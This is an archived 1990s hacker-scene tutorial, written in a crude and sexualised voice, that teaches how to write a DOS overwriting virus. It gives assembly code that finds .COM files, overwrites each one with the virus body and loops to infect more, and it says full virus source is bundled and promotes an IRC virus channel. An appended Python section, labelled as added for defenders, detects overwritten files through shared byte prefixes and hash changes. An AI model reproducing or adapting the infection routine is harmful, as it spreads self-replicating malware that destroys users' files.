
Virus tutorial on overwritterz by krackbaby/LT


---==kRaCkBaBy's Overwritter Tutorial==---

Da`kRaCkHoUsE Presents: kRaCkBaBy's Overwritter Tutorial

--Disklamer----------

Ok...let's get this out ov the way, overwritters are lame but
there is still a lack ov information on the subject and it is a good
place to start for beginnerz so here is my lame tutorial.

--Preparation--------

You must gather your toolz. So i get my assembler, linker,
vaseline and text editor. Then i put on my black leather corset and
black fishnets, heelz and elbow length glovez. Take a sip and swig
ov DrPepper (nektor ov the godz) and light a cigarette.

--First--------------

First things third, you need to have some elementary
understanding ov assembly. Even for overwritters. There are a lot ov
tutorials on assembly out there on the net so get out there and find
them.

--koding-------------

Ok let's get to the coding. The first thing you will need the
virus ta do is find a host. So what you use is tha find first/find next
funktion ov DOS interrupt 21h. Funktion = 4e00h and the interrupt is 21h,
like this:

    mov ax,4e00h            ;dos funktion find first matching file
    mov cx,0                ;with these attributes (archive only)
    mov dx,offset prey      ;offset of filemask
    int 21h                 ;execute the dos funktion set above in ax
    ...
    prey db '*.com', 0      ;place to put filemask

The above code will find a .COM file with the archive
attribute only, no other attributes are set on the file that it looks
for. Ok now that you have found the file that you are gonna infect
we need to open the file. Ok the funktion = 3d02h like this:

    mov ax,3d02h            ;dos funktion open file read write
    mov dx,9eh              ;offset of filename in dta
    int 21h                 ;execute the dos funktion set above in ax

Now you just opened the file and when you executed this
funktion the 'file handle' is returned in AX and we need it in BX
so we do an exchange. Like this:

    xchg ax,bx

Ok now we are ready for the part that makes me get all hot and
bothered :) :P :b ;). Infection is sooo sexy. Now we write the virus
to the host or for the slower ppl, the file we just found and opened.
Now to do that we use funktion = 4000h like this:

    mov ax,4000h                ;dos funktion write to file
    mov cx,ksinkvxe-ksinkvxs    ;how many bytes to write
    mov dx,offset ksinkvxs      ;where to start
    int 21h                     ;execute the dos funktion set above in ax

MMmmmmmmmmmmmmmm makes me soooo HOT and BOTHERED when i do that.
Ok well now that we have done that we are almost done. But not till i
climax. ;) Ok we now have to close tha file we opened. So we use the
funktion = 3e00h like this:

    mov ax,3e00h            ;dos funktion close file
    int 21h                 ;execute the dos funktion set above in ax

Ok the file is closed and the virus written to it. Now we will
look for another file to infect so we set the find next funktion and
jump up to the int 21h after the find first funktion and use that. :)
The find next funktion = 4f00h like this:

    mov ax,4f00h            ;dos funktion find next matching file
    jmp trollmore           ;jump to label trollmore
                            ;cx and dx are already set in the
                            ;find first routine

Now all we need ta do is to terminate execution ov the virus
code and we are done! So ta do this we use the terminate funktion
4c00h like this:

    mov ax,4c00h            ;dos funktion terminate with output
    int 21h                 ;execute funktion we set in ax above

Ok we are done now and the virus has spread. :) The above
code samples were taken from one ov the first virii i wrote so suck my
ass if ya don't like it. ;) The code is from the kitchensink virus
which is included in this zip file, along with v2.oo ov the
kitchensink virus and Krap v2.oo one ov the first versions of my
Champainge virus. And the backmasking virus, also one ov my first,
which is basically kitchensink running backwards....oh well, still
can't code fer shit.....time to end class my fishnets got a run in
them and this corset is sooooo tight. ;) Cya l8r sexy boys. Kum see me
on IRC Undernet #virus or #!!!!!strap-on....Hugz and kissez :*


+----===={forever yourz
+-----===={kRaCkBaBy/LT
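
A defender-side view of the behaviour described above, as an added example that is not part of the original tutorial or its author's code: because the same block of bytes is written to every matching *.com file right after it is opened, affected files end up sharing an identical leading byte run and no longer match a recorded hash baseline. The function names, the 64-byte threshold and the sample data are assumptions made for this illustration.

```python
import hashlib
from pathlib import Path

MIN_SHARED = 64  # assumed threshold: identical leading bytes needed to flag a group

def load_com_files(directory):
    """Read every *.COM file (case-insensitive) in one directory into memory."""
    return {p.name: p.read_bytes() for p in Path(directory).iterdir()
            if p.is_file() and p.suffix.lower() == ".com"}

def common_prefix_len(a, b):
    """Number of leading bytes that a and b have in common."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n

def shared_prefix_clusters(files, min_shared=MIN_SHARED):
    """Return [(sorted names, shared prefix length)] for groups of two or more
    files whose first min_shared bytes are byte-for-byte identical."""
    groups = {}
    for name, data in files.items():
        if len(data) >= min_shared:
            groups.setdefault(data[:min_shared], []).append(name)
    clusters = []
    for names in groups.values():
        if len(names) > 1:
            names.sort()
            first = files[names[0]]
            shared = min(common_prefix_len(first, files[n]) for n in names[1:])
            clusters.append((names, shared))
    return sorted(clusters)

def changed_since_baseline(files, baseline):
    """Names whose SHA-256 no longer matches a previously recorded baseline."""
    return sorted(n for n, d in files.items()
                  if n in baseline and hashlib.sha256(d).hexdigest() != baseline[n])

# Constructed sample data (inert filler bytes, not real program code).
FILLER = b"CONSTRUCTED-FILLER-" * 5   # 95 bytes standing in for the written block
ORIGINALS = {"A.COM": b"\x01" * 300, "B.COM": b"\x02" * 120, "C.COM": b"\x03" * 200}
BASELINE = {n: hashlib.sha256(d).hexdigest() for n, d in ORIGINALS.items()}
SAMPLE = dict(ORIGINALS)
for name in ("A.COM", "B.COM"):       # simulate the overwrite of the file start
    SAMPLE[name] = FILLER + ORIGINALS[name][len(FILLER):]
```

Programs built with the same compiler runtime or packer stub can also share a long prefix, so a cluster is a triage lead to confirm against the baseline, not a verdict.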

 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
If you have any questions about this, please check out our Copyright Policy.

 
